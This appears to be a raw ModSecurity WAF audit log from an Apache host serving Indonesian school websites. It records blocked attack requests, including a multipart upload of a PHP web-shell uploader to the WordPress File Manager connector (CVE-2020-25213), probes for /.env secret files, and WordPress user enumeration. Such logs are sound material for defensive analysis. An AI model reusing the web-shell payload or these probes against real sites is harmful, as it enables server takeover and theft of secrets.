';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF" Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747592070367214 2017 (- - -) Stopwatch2: 1747592070367214 2017; combined=688, p1=442, p2=220, p3=0, p4=0, p5=26, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cd8d867-Z-- --f58f1d5c-A-- [19/May/2025:01:14:37 +0700] aCojjfypzAd0elWOk7rlYwAAABg 103.236.140.4 39462 103.236.140.4 8181 --f58f1d5c-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: www.smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 733 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: multipart/form-data; boundary=5150b503abb7b0bcdc8b33c7c6e1d8e6 --f58f1d5c-C-- --5150b503abb7b0bcdc8b33c7c6e1d8e6 Content-Disposition: form-data; name="cmd" upload --5150b503abb7b0bcdc8b33c7c6e1d8e6 Content-Disposition: form-data; name="target" l1_Lw --5150b503abb7b0bcdc8b33c7c6e1d8e6 Content-Disposition: form-data; name="upload[]"; filename="TitaniumEx.php" Content-Type: multipart/form-data

Telegram : @BIBIL_0DAY

'.php_uname()." ".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}} } ?> --5150b503abb7b0bcdc8b33c7c6e1d8e6-- --f58f1d5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f58f1d5c-E-- --f58f1d5c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||www.smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747592077496497 3881 (- - -) Stopwatch2: 1747592077496497 3881; combined=2743, p1=507, p2=2204, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f58f1d5c-Z-- --eb630865-A-- [19/May/2025:01:29:32 +0700] aConDBir-GlPrFVVKe7aMgAAAEU 103.236.140.4 39940 103.236.140.4 8181 --eb630865-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --eb630865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb630865-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747592972400567 924 (- - -) Stopwatch2: 1747592972400567 924; combined=345, p1=302, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb630865-Z-- --dedfe96c-A-- [19/May/2025:01:46:09 +0700] aCoq8fypzAd0elWOk7rlkAAAABA 103.236.140.4 40018 103.236.140.4 8181 --dedfe96c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.122.164.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.122.164.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dedfe96c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dedfe96c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747593969220752 3388 (- - -) Stopwatch2: 1747593969220752 3388; combined=1480, p1=515, p2=922, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dedfe96c-Z-- --365a3113-A-- [19/May/2025:01:54:24 +0700] aCos4Bir-GlPrFVVKe7aRwAAAFI 103.236.140.4 40334 103.236.140.4 8181 --365a3113-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 5.135.71.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.135.71.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --365a3113-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --365a3113-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747594464450640 2309 (- - -) Stopwatch2: 1747594464450640 2309; combined=1215, p1=405, p2=782, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --365a3113-Z-- --e165aa48-A-- [19/May/2025:02:03:12 +0700] aCou8Bir-GlPrFVVKe7aUgAAAEY 103.236.140.4 40508 103.236.140.4 8181 --e165aa48-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.152.106.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.152.106.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e165aa48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e165aa48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747594992596711 3547 (- - -) Stopwatch2: 1747594992596711 3547; combined=1514, p1=514, p2=960, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e165aa48-Z-- --45f17111-A-- [19/May/2025:02:07:07 +0700] aCov2xir-GlPrFVVKe7aVwAAAE8 103.236.140.4 40526 103.236.140.4 8181 --45f17111-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.165.76.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.165.76.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --45f17111-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45f17111-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747595227431007 3310 (- - -) Stopwatch2: 1747595227431007 3310; combined=1442, p1=501, p2=909, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45f17111-Z-- --99dba41a-A-- [19/May/2025:02:12:27 +0700] aCoxG0PRqak7bVuUS6fF-AAAAII 103.236.140.4 40556 103.236.140.4 8181 --99dba41a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.239.52.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.239.52.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --99dba41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99dba41a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747595547384688 3535 (- - -) Stopwatch2: 1747595547384688 3535; combined=1538, p1=555, p2=950, p3=0, p4=0, p5=32, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99dba41a-Z-- --281a7667-A-- [19/May/2025:02:49:39 +0700] aCo50xir-GlPrFVVKe7aigAAAFU 103.236.140.4 40748 103.236.140.4 8181 --281a7667-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.160.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.160.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --281a7667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --281a7667-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747597779274864 2933 (- - -) Stopwatch2: 1747597779274864 2933; combined=1281, p1=444, p2=805, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --281a7667-Z-- --5d913572-A-- [19/May/2025:03:08:35 +0700] aCo-Q0PRqak7bVuUS6fGngAAAI4 103.236.140.4 42902 103.236.140.4 8181 --5d913572-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.227.154.122 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.227.154.122 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5d913572-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d913572-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747598915750524 740 (- - -) Stopwatch2: 1747598915750524 740; combined=303, p1=263, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d913572-Z-- --76ad541b-A-- [19/May/2025:03:30:49 +0700] aCpDeRir-GlPrFVVKe7hBAAAAEM 103.236.140.4 39874 103.236.140.4 8181 --76ad541b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 143.244.185.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.244.185.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --76ad541b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76ad541b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747600249720739 2440 (- - -) Stopwatch2: 1747600249720739 2440; combined=1357, p1=445, p2=877, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76ad541b-Z-- --53dfbb7a-A-- [19/May/2025:03:32:28 +0700] aCpD3FewLfDrCkDGIGz8oAAAANY 103.236.140.4 45900 103.236.140.4 8181 --53dfbb7a-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 143.198.94.52 Accept-Encoding: gzip X-Varnish: 156624959 --53dfbb7a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --53dfbb7a-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747600348670922 2604 (- - -) Stopwatch2: 1747600348670922 2604; combined=1430, p1=375, p2=1028, p3=0, p4=0, p5=26, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53dfbb7a-Z-- --c420976b-A-- [19/May/2025:03:32:28 +0700] aCpD3FewLfDrCkDGIGz8owAAAMc 103.236.140.4 45910 103.236.140.4 8181 --c420976b-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 143.198.94.52 Accept-Encoding: gzip X-Varnish: 156386804 --c420976b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c420976b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747600348835824 2795 (- - -) Stopwatch2: 1747600348835824 2795; combined=1350, p1=368, p2=960, p3=0, p4=0, p5=22, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c420976b-Z-- --2caf3b14-A-- [19/May/2025:03:34:07 +0700] aCpEP_ypzAd0elWOk7ruNgAAAAM 103.236.140.4 52328 103.236.140.4 8181 --2caf3b14-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2caf3b14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2caf3b14-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||up.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747600447205189 22114 (- - -) Stopwatch2: 1747600447205189 22114; combined=10989, p1=452, p2=10497, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2caf3b14-Z-- --fa403e29-A-- [19/May/2025:03:34:07 +0700] aCpEP1ewLfDrCkDGIGz-igAAAMc 103.236.140.4 52338 103.236.140.4 8181 --fa403e29-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --fa403e29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa403e29-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||up.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747600447342102 2743 (- - -) Stopwatch2: 1747600447342102 2743; combined=1780, p1=456, p2=1292, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa403e29-Z-- --e2556174-A-- [19/May/2025:04:01:09 +0700] aCpKlWyGBQNQTJej4E57UQAAAJE 103.236.140.4 41798 103.236.140.4 8181 --e2556174-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --e2556174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2556174-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747602069055985 945 (- - -) Stopwatch2: 1747602069055985 945; combined=416, p1=379, p2=0, p3=0, p4=0, p5=37, sr=159, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2556174-Z-- --30e15515-A-- [19/May/2025:04:19:54 +0700] aCpO-myGBQNQTJej4E57pgAAAIM 103.236.140.4 42142 103.236.140.4 8181 --30e15515-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --30e15515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30e15515-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] 